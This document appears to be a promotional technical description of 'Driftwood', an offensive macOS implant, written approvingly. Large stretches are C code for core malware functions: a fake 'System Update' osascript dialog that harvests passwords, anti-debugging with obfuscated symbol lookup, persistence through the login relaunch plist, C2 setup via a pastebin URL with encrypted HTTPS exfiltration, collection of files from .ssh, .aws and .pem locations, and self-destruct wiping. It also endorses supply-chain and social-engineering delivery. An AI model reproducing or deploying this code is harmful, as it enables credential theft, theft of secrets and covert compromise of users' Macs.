Executive Summary

IRIS C2 has unveiled Driftwood, a next-generation macOS implant that sets a new standard for sophisticated offensive tooling. This implant represents a major leap in macOS-targeted capabilities, combining runtime code polymorphism with advanced anti-analysis techniques and seamless multi-architecture support. Driftwood's engineering demonstrates deep understanding of macOS internals and modern security challenges, making it exceptionally difficult for traditional endpoint protection platforms to detect or analyze.

Critically, unlike much of the flashy macOS security research that relies on chaining together rare and expensive exploits, Driftwood operates entirely within the constraints of modern macOS security boundaries. The implant requires no System Integrity Protection (SIP) bypasses, kernel exploits, or other unreliable exploit chains that so-often characterize academic proof-of-concepts that one comes to expect from conference talks. Instead, Driftwood achieves its sophisticated capabilities through careful engineering that works within Apple's distinct macOS security model, making it immediately deployable in real-world enterprise environments where Macs are increasingly prevalent, particularly among software developers.

Architecture and Design Philosophy

Driftwood employs a modular architecture designed around continuous adaptation while respecting macOS security boundaries. The implant consists of interconnected components that provide comprehensive post-exploitation capabilities through constant evolution—all without requiring privilege escalation beyond what users willingly provide.

The core engine handles runtime code transformation entirely within user-space memory, ensuring the implant's binary signature changes continuously during execution without triggering System Integrity Protection violations. This is complemented by operations modules that manage command and control communications, data collection from user-accessible locations, and payload orchestration through standard macOS APIs.

The design philosophy centers on working within Apple's security model rather than against it, ensuring effectiveness across diverse deployment scenarios including fully-patched systems with SIP enabled. This pragmatic approach provides consistent capabilities across default macOS configurations without relying on fragile exploit chains.

Deployment and Infiltration Strategies

Driftwood's design as a legitimate-appearing application makes it well-suited for sophisticated social engineering campaigns proven effective against macOS users in enterprise environments. The implant's small binary size and modularity enable deployment through multiple vectors: supply chain attacks via compromised open source repositories, inclusion with otherwise innocent macOS applications, or injection at build time through obfuscated malicious scripts.

The implant's sophisticated credential harvesting capabilities make it ideal for scenarios where initial user interaction is expected and can be leveraged for further access. Recent campaigns attributed to North Korea's APT38 (Lazarus Group) and similar groups have demonstrated the effectiveness of impersonating legitimate business processes, particularly in remote work environments where video conferencing and collaboration tools are ubiquitous.

Notably, macOS users become accustomed to nearly constant prompts for administrative passwords—a well-meaning security measure that paradoxically makes privilege escalation trivial. Rather than requiring creative exploits, elevation becomes just another annoying popup, similar to those from Dropbox or other legitimate applications.

Driftwood's modular architecture supports sophisticated multi-stage delivery mechanisms that adapt to different target environments. Initial components can be delivered through lightweight vectors such as AppleScript files, with additional capabilities downloaded based on target characteristics. The polymorphic engine's ability to generate unique variants ensures operational resilience—even if initial delivery vectors are blocked, subsequent campaigns employ completely different binary signatures while maintaining identical functionality.

Polymorphic Engine: Continuous Code Evolution

Driftwood's defining characteristic is its ability to continuously transform its own code during execution using only standard memory management capabilities available to any macOS application. This polymorphic engine represents a significant advancement over traditional static evasion techniques, providing dynamic adaptation that renders signature-based detection ineffective.

The system operates through multiple transformation strategies applied individually or in combination within memory regions the process legitimately owns. Key techniques include instruction swapping to rearrange equivalent operations without changing functionality, sophisticated junk code insertion that adds meaningless but valid instructions, and opaque predicates—conditional branches that always evaluate the same way but create false control flow paths that confuse static analysis tools.

// Example polymorphic transformation strategies
void apply_mutations(uint8_t *code, size_t size, rng_state_t *rng) {
    uint8_t strategy = get_random(rng) % 4;
    
    switch (strategy) {
        case 0: // Instruction swapping
            swap_equivalent_instructions(code, size, rng);
            break;
        case 1: // Junk code insertion
            insert_nop_equivalents(code, size, rng);
            break;
        case 2: // Opaque predicates
            insert_always_true_branch(code, size, rng);
            break;
        case 3: // Register substitution
            substitute_equivalent_registers(code, size, rng);
            break;
    }
    
    // Validate transformation maintains code integrity
    if (!validate_code_integrity(code, size)) {
        revert_transformation(code, size);
    }
}

The polymorphic transformations are driven by cryptographically secure randomization using system-provided entropy sources, ensuring mutation patterns cannot be predicted or replicated. Each execution produces a genuinely unique variant, making it virtually impossible to develop universal signatures for detection.

Critically, the engine includes comprehensive validation mechanisms that verify each transformation maintains code integrity and doesn't violate memory protection boundaries. This prevents the common problem of polymorphic engines corrupting their own code or triggering system security violations, ensuring reliable operation across diverse system configurations including those with full SIP enforcement.

Anti-Analysis and Self-Modification

Driftwood implements multiple layers of protection against reverse engineering and dynamic analysis, operating from the moment of execution with constructor functions that detect debugging environments before main program logic executes.

The debugger detection system employs sophisticated techniques, leveraging system control interfaces with obfuscated symbol resolution rather than easily-detected API calls. Function names are generated dynamically using runtime-calculated keys, making it difficult for analysts to identify detection mechanisms through static analysis. When debugging is detected, the implant immediately triggers its panic mechanism, terminating execution and potentially corrupting its own binary.

// Dynamic symbol resolution for anti-debugging
char* generate_symbol_name(uint32_t seed) {
    char *symbol = malloc(8);
    uint8_t key = (getpid() ^ time(NULL)) & 0xFF;
    
    // XOR-obfuscated "sysctl" generation
    uint8_t encoded[] = {0x73^key, 0x79^key, 0x73^key, 0x63^key, 0x74^key, 0x6c^key};
    for (int i = 0; i < 6; i++) {
        symbol[i] = encoded[i] ^ key;
    }
    symbol[6] = '\0';
    return symbol;
}

bool detect_debugger() {
    char *symbol_name = generate_symbol_name(time(NULL));
    sysctl_func_t sysctl_ptr = dlsym(RTLD_DEFAULT, symbol_name);
    free(symbol_name);
    
    if (!sysctl_ptr) return false;
    
    int mib[4] = {CTL_KERN, KERN_PROC, KERN_PROC_PID, getpid()};
    struct kinfo_proc info;
    size_t size = sizeof(info);
    
    if (sysctl_ptr(mib, 4, &info, &size, NULL, 0) == 0) {
        if (info.kp_proc.p_flag & P_TRACED) {
            panic_and_destroy();
            return true;
        }
    }
    return false;
}

The implant's self-modification capabilities extend beyond runtime polymorphism to include persistent changes to its own binary through legitimate file system operations. Through a sophisticated boot and cook cycle, Driftwood manages encrypted payload sections within its Mach-O structure, strategically copying itself to temporary directories where binary modification won't trigger SIP violations.

During initialization, the implant decrypts its core functionality, applies polymorphic transformations, and re-encrypts the payload with new keys before updating the binary on disk—all through standard file I/O operations. This creates a moving target for analysis, as each execution cycle produces a genuinely different binary file without requiring system-level exploits, ensuring previous analysis sessions cannot inform future attempts to understand the implant's behavior.

Privilege Escalation and Credential Harvesting

Driftwood's approach to privilege escalation demonstrates sophisticated understanding of user psychology and macOS authentication mechanisms. Rather than relying on technical exploits, the implant employs carefully crafted social engineering techniques that leverage users' trust in legitimate system processes.

The privilege escalation strategy reflects lessons learned from successful real-world campaigns where attackers establish credibility through extended social engineering before requesting sensitive actions. Authentication prompts are designed to appear during moments when users expect legitimate system interactions, such as after software installations or during apparent system maintenance activities.

The implant intelligently adapts its strategy based on the current user's administrative status and established social engineering context. For users with administrative privileges, it presents convincing system update prompts identical to legitimate macOS notifications, using appropriate system icons, professional language, and familiar dialog styling. For standard users, it requests administrative credentials using prompts that mimic common enterprise scenarios requiring elevated privileges.

// Adaptive privilege escalation based on user context
void request_credentials() {
    const char *current_user = getlogin();
    bool is_admin = check_admin_privileges(current_user);
    
    char prompt_script[1024];
    if (is_admin) {
        // Admin user - request password for "system update"
        snprintf(prompt_script, sizeof(prompt_script),
            "osascript -e 'display dialog \"System update requires your password.\\n\\n"
            "Enter password:\" with title \"System Update\" with icon caution "
            "default answer \"\" giving up after 30 with hidden answer'");
    } else {
        // Standard user - request admin credentials
        snprintf(prompt_script, sizeof(prompt_script),
            "osascript -e 'display dialog \"Admin privileges required.\\n\\n"
            "Enter admin password:\" with title \"Admin Access\" with icon caution "
            "default answer \"\" giving up after 30 with hidden answer'");
    }
    
    char *password = execute_and_extract(prompt_script);
    if (password && validate_credentials(current_user, password)) {
        // Proceed with elevated operations
        store_credentials(current_user, password);
    }
    secure_free(password);
}

The system includes multiple fallback strategies and retry mechanisms, ensuring persistent but not overly aggressive credential harvesting. All harvested credentials undergo real-time validation using macOS Directory Services, ensuring the implant only proceeds with valid authentication information while preventing security alerts or account lockouts. The validation mechanism operates through legitimate system interfaces, making it indistinguishable from normal authentication processes.

Persistence Mechanisms

Driftwood achieves persistence through manipulation of macOS's native application relaunch system, demonstrating deep understanding of the operating system's internal mechanisms while operating entirely within user-space boundaries. Rather than using commonly monitored persistence methods like launch agents or startup items, the implant directly modifies user-specific application relaunch databases.

This approach leverages macOS's built-in functionality for restoring applications after system restarts or user logouts, targeting plist files in user-writable locations outside SIP's protection scope. By inserting itself into the relaunch mechanism through standard CoreFoundation APIs, the implant ensures automatic execution without creating obvious artifacts that security tools typically monitor.

// Persistence via login items manipulation
void establish_persistence() {
    char plist_path[512];
    struct passwd *pw = getpwuid(getuid());
    const char *executable_name = get_executable_basename();
    
    snprintf(plist_path, sizeof(plist_path), 
        "%s/Library/Application Support/%s.plist", 
        pw->pw_dir, executable_name);
    
    // Create/modify TALAppsToRelaunchAtLogin array
    CFURLRef plist_url = CFURLCreateFromFileSystemRepresentation(
        NULL, (const UInt8*)plist_path, strlen(plist_path), false);
    
    CFMutableDictionaryRef plist_dict = CFDictionaryCreateMutable(
        kCFAllocatorDefault, 0, 
        &kCFTypeDictionaryKeyCallBacks, 
        &kCFTypeDictionaryValueCallBacks);
    
    CFMutableArrayRef apps_array = CFArrayCreateMutable(
        kCFAllocatorDefault, 0, &kCFTypeArrayCallBacks);
    
    // Add current executable to relaunch list
    CFMutableDictionaryRef app_entry = CFDictionaryCreateMutable(
        kCFAllocatorDefault, 2,
        &kCFTypeDictionaryKeyCallBacks,
        &kCFTypeDictionaryValueCallBacks);
    
    char exe_path[1024];
    get_executable_path(exe_path, sizeof(exe_path));
    CFStringRef path_str = CFStringCreateWithCString(
        kCFAllocatorDefault, exe_path, kCFStringEncodingUTF8);
    
    CFDictionarySetValue(app_entry, CFSTR("Path"), path_str);
    CFArrayAppendValue(apps_array, app_entry);
    CFDictionarySetValue(plist_dict, CFSTR("TALAppsToRelaunchAtLogin"), apps_array);
    
    // Write plist to disk
    write_plist_to_file(plist_dict, plist_url);
    
    // Cleanup
    CFRelease(path_str);
    CFRelease(app_entry);
    CFRelease(apps_array);
    CFRelease(plist_dict);
    CFRelease(plist_url);
}

The persistence mechanism operates entirely at the user level, requiring no elevated privileges beyond what the user has already granted through social engineering. This design choice reduces the implant's attack surface while ensuring consistent functionality across different system configurations, including those with SIP enabled and additional security hardening measures.

Command and Control Infrastructure

Driftwood's command and control architecture demonstrates enterprise-grade operational security through multi-stage communication design. The implant employs a sophisticated bootstrapping process that separates configuration retrieval from operational communications, reducing infrastructure exposure risk.

The initial stage leverages legitimate third-party services for configuration retrieval, using platforms that blend seamlessly with normal internet traffic and provide operational flexibility while maintaining plausible deniability. Once configured, the implant establishes secure communications channels using hybrid encryption, combining RSA public key cryptography for key exchange with AES symmetric encryption for bulk data transfer.

// Multi-stage C2 communication setup
typedef struct {
    char c2_endpoint[256];
    char pubkey_url[256];
    uint8_t aes_key[32];
    RSA *rsa_pubkey;
} c2_config_t;

int bootstrap_c2_communications(c2_config_t *config) {
    // Stage 1: Retrieve configuration from legitimate service
    char bootstrap_url[] = "https://pastebin.com/raw/ConfigID";
    char *config_data = fetch_url_content(bootstrap_url);
    if (!config_data) return -1;
    
    // Parse configuration (C2 endpoint and public key URL)
    parse_configuration(config_data, config->c2_endpoint, config->pubkey_url);
    free(config_data);
    
    // Stage 2: Retrieve RSA public key
    char *pubkey_pem = fetch_url_content(config->pubkey_url);
    if (!pubkey_pem) return -1;
    
    config->rsa_pubkey = load_rsa_public_key(pubkey_pem);
    free(pubkey_pem);
    
    // Stage 3: Generate AES session key
    if (!RAND_bytes(config->aes_key, sizeof(config->aes_key))) {
        return -1;
    }
    
    return 0;
}

// Encrypted data transmission
int send_encrypted_data(c2_config_t *config, const uint8_t *data, size_t len) {
    // Encrypt data with AES
    uint8_t *encrypted_data = aes_encrypt(data, len, config->aes_key);
    
    // Encrypt AES key with RSA
    uint8_t *encrypted_key = rsa_encrypt(config->aes_key, 32, config->rsa_pubkey);
    
    // Package and send via HTTPS POST
    return send_https_post(config->c2_endpoint, encrypted_key, encrypted_data, len);
}

Data collection capabilities are comprehensive, gathering detailed system information through legitimate macOS utilities and APIs. File collection operates through configurable filters that target specific data types while avoiding unnecessary network traffic. All collected data undergoes compression and encryption before transmission, optimizing bandwidth usage while maintaining security.

Multi-Architecture Support

Driftwood's multi-architecture capabilities address the modern macOS landscape where organizations operate mixed environments of Intel-based and Apple Silicon systems. The implant provides native support for both x86_64 and ARM64 architectures through sophisticated instruction set abstraction that extends beyond simple compatibility to include optimization for each platform's unique characteristics.

The polymorphic engine adapts its transformation strategies based on the target architecture, ensuring mutations remain effective regardless of the underlying processor. The instruction decoding capabilities demonstrate deep understanding of both Intel and ARM instruction sets, accurately parsing complex instruction formats, handling architecture-specific addressing modes, and identifying control flow patterns necessary for safe code transformation.

This dual-architecture approach ensures organizations cannot rely on hardware diversity as a security measure—whether deploying on legacy Intel systems or modern Apple Silicon hardware, Driftwood maintains consistent capabilities and effectiveness.

Comprehensive Evasion Strategy

Driftwood's evasion capabilities operate across multiple analysis domains, creating comprehensive defense against modern security tools. Static analysis evasion centers on eliminating predictable signatures through runtime string construction and dynamic symbol resolution, keeping critical functionality hidden until execution.

Dynamic analysis countermeasures represent a significant advancement over traditional anti-debugging techniques. Rather than simply detecting debuggers, the implant creates an actively hostile environment for analysis where continuous code mutation ensures that even if analysts bypass initial protections, the code they observe changes constantly.

Behavioral evasion techniques focus on mimicking legitimate system processes and user interactions. All operations utilize standard macOS APIs in ways that appear normal to behavioral analysis systems, while social engineering components generate user interactions matching expected patterns for legitimate software.

This defense-in-depth approach significantly increases the time and expertise required for successful analysis, making Driftwood particularly challenging for automated security tools and junior analysts.

Data Collection and Exfiltration

Driftwood's data collection capabilities demonstrate sophisticated understanding of both enterprise data environments and macOS security constraints. The system implements intelligent file harvesting that operates within System Integrity Protection boundaries while achieving comprehensive data collection through user-accessible locations.

The file collection engine uses configurable filters targeting user documents, downloads, and application data—areas accessible even under SIP enforcement. Rather than attempting to access system-protected directories that would trigger security violations, the implant focuses on user-generated content where valuable intelligence typically resides, efficiently traversing complex directory structures while maintaining low system resource footprint.

// Intelligent file collection within SIP boundaries
const char *TARGET_EXTENSIONS[] = {"txt", "doc", "pdf", "key", "pem", NULL};
const char *TARGET_DIRECTORIES[] = {
    "Documents", "Downloads", "Desktop", 
    ".ssh", ".aws", ".config", NULL
};

int collect_files() {
    const char *home_dir = getenv("HOME");
    if (!home_dir) return -1;
    
    for (int i = 0; TARGET_DIRECTORIES[i]; i++) {
        char search_path[512];
        snprintf(search_path, sizeof(search_path), "%s/%s", 
                 home_dir, TARGET_DIRECTORIES[i]);
        
        // Use nftw for efficient directory traversal
        if (nftw(search_path, file_collector_callback, 10, FTW_PHYS) == -1) {
            continue; // Skip inaccessible directories
        }
    }
    
    return 0;
}

int file_collector_callback(const char *fpath, const struct stat *sb, 
                           int typeflag, struct FTW *ftwbuf) {
    if (typeflag != FTW_F || sb->st_size == 0) return 0;
    
    const char *ext = strrchr(fpath, '.');
    if (!ext) return 0;
    ext++; // Skip the dot
    
    // Check if extension matches our targets
    for (int i = 0; TARGET_EXTENSIONS[i]; i++) {
        if (strcasecmp(ext, TARGET_EXTENSIONS[i]) == 0) {
            // Copy file to staging area for later exfiltration
            stage_file_for_collection(fpath, sb->st_size);
            break;
        }
    }
    
    return 0;
}

The implant's data collection strategy acknowledges modern macOS Transparency, Consent, and Control (TCC) protections. While this may prompt users for access to certain protected folders, the implant's social engineering capabilities make such requests appear legitimate, similar to how legitimate applications request document access.

The data processing pipeline optimizes for both security and efficiency within standard user-space constraints. Collected files undergo archiving and compression to minimize network bandwidth requirements, while strong encryption ensures intercepted communications cannot be analyzed. The exfiltration mechanism uses standard HTTPS communications that blend seamlessly with normal internet traffic, making encrypted payloads appear as routine application data.

Self-Destruction and Operational Security

Driftwood incorporates comprehensive self-destruction capabilities designed to prevent forensic analysis and protect operational infrastructure. The implant's approach to evidence elimination goes beyond simple file deletion to include secure wiping techniques using multiple overwrite passes with different data patterns, ensuring sensitive information cannot be recovered through advanced forensic techniques.

Before termination, the implant corrupts its own binary structure, making it impossible to analyze the original code even if the file system location is discovered. This corruption process targets critical header information and code sections, rendering the binary unusable for reverse engineering purposes.

// Self-destruction with binary corruption
void panic_and_destroy() {
    char self_path[1024];
    uint32_t path_size = sizeof(self_path);
    
    // Get path to current executable
    if (_NSGetExecutablePath(self_path, &path_size) != 0) {
        exit(EXIT_FAILURE);
    }
    
    // Corrupt Mach-O header and critical sections
    int fd = open(self_path, O_RDWR);
    if (fd >= 0) {
        // Corrupt magic number and load commands
        uint32_t corruption_data = arc4random();
        pwrite(fd, &corruption_data, sizeof(corruption_data), 0);
        
        // Corrupt additional header fields
        for (int i = 0; i < 16; i++) {
            off_t offset = arc4random_uniform(4096);
            uint32_t random_data = arc4random();
            pwrite(fd, &random_data, sizeof(random_data), offset);
        }
        
        fsync(fd);
        close(fd);
    }
    
    // Secure wipe with multiple passes
    secure_wipe_file(self_path, 7);
    
    // Final cleanup and exit
    unlink(self_path);
    exit(EXIT_SUCCESS);
}

void secure_wipe_file(const char *path, int passes) {
    struct stat st;
    if (stat(path, &st) != 0) return;
    
    size_t file_size = st.st_size;
    uint8_t *wipe_buffer = malloc(file_size);
    if (!wipe_buffer) return;
    
    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        free(wipe_buffer);
        return;
    }
    
    for (int pass = 0; pass < passes; pass++) {
        // Different patterns for each pass
        uint8_t pattern = (pass == passes-1) ? 0x00 : arc4random_uniform(256);
        memset(wipe_buffer, pattern, file_size);
        
        lseek(fd, 0, SEEK_SET);
        write(fd, wipe_buffer, file_size);
        fsync(fd);
    }
    
    close(fd);
    free(wipe_buffer);
}

The panic mechanisms provide multiple triggers for immediate self-destruction, responding to debugger detection, authentication failures, communication errors, and other indicators of compromise. The rapid response capability ensures that even sophisticated analysis attempts are likely to result in evidence destruction rather than successful capture.

Technical Innovations

Driftwood represents several significant advances in implant engineering that set new standards for sophistication and effectiveness while operating within legitimate system boundaries. Key innovations include:

• Runtime Binary Modification: The implant continuously evolves its on-disk presence without requiring system-level exploits, creating a moving target that defeats traditional file-based detection approaches. This technique requires deep understanding of operating system internals and works reliably across default macOS configurations.
• Instruction-Level Validation: All polymorphic transformations maintain code integrity and respect memory protection boundaries, preventing the crashes and system violations that plague many self-modifying programs. This reliability is crucial for operational deployments where implant failure could compromise entire operations.
• Cryptographically Secure Randomization: All mutation decisions use legitimate system APIs for entropy, ensuring the implant's behavior cannot be predicted or replicated by analysts while maintaining compatibility with system security features.
• Defensive Programming: The approach represents mature understanding of both operational security requirements and system constraints, prioritizing working within system boundaries while protecting operational infrastructure across diverse deployment scenarios.

Detection Challenges for Security Teams

Driftwood presents significant challenges for traditional security approaches, requiring organizations to fundamentally reconsider their detection strategies. Unlike malware that relies on exploits or system violations, Driftwood operates entirely within legitimate system boundaries, making detection significantly more challenging.

Static Analysis Limitations: Tools face immediate obstacles due to encrypted payload sections and runtime string construction. Polymorphic mutations ensure each execution produces a unique binary signature, making reliable static signatures impossible. Because the implant doesn't rely on exploit code or unusual system calls, traditional signature-based approaches are ineffective.

Dynamic Analysis Difficulties: Sophisticated anti-analysis capabilities prevent execution in controlled environments through early debugger detection and immediate panic responses. Continuous code mutations make understanding behavior difficult even if initial protections are bypassed, while standard system API usage means behavioral analysis cannot detect unusual or privileged operations.

Behavioral Analysis Challenges: Systems face the fundamental challenge of distinguishing malicious activity from legitimate operations when malware operates within normal system boundaries. Exclusive use of standard macOS APIs, combined with sophisticated social engineering and native persistence mechanisms, creates activity patterns resembling normal application behavior.

Conclusion

Driftwood represents a watershed moment in macOS-targeted offensive tooling, demonstrating capabilities that fundamentally challenge existing security paradigms while operating entirely within Apple's security model. Unlike the parade of academic research that requires exotic exploit chains, SIP bypasses, or other unrealistic preconditions, Driftwood achieves sophisticated capabilities through careful engineering that works on default macOS installations.

The implant's sophisticated engineering reflects deep understanding of both macOS internals and the practical constraints of real-world deployments. By working within system boundaries rather than against them, Driftwood achieves reliability and consistency that makes it immediately deployable in enterprise environments where Macs are increasingly common. The comprehensive error handling, robust cryptographic implementation, and sophisticated evasion techniques indicate significant investment in creating a professional-grade tool that doesn't rely on fragile exploit chains.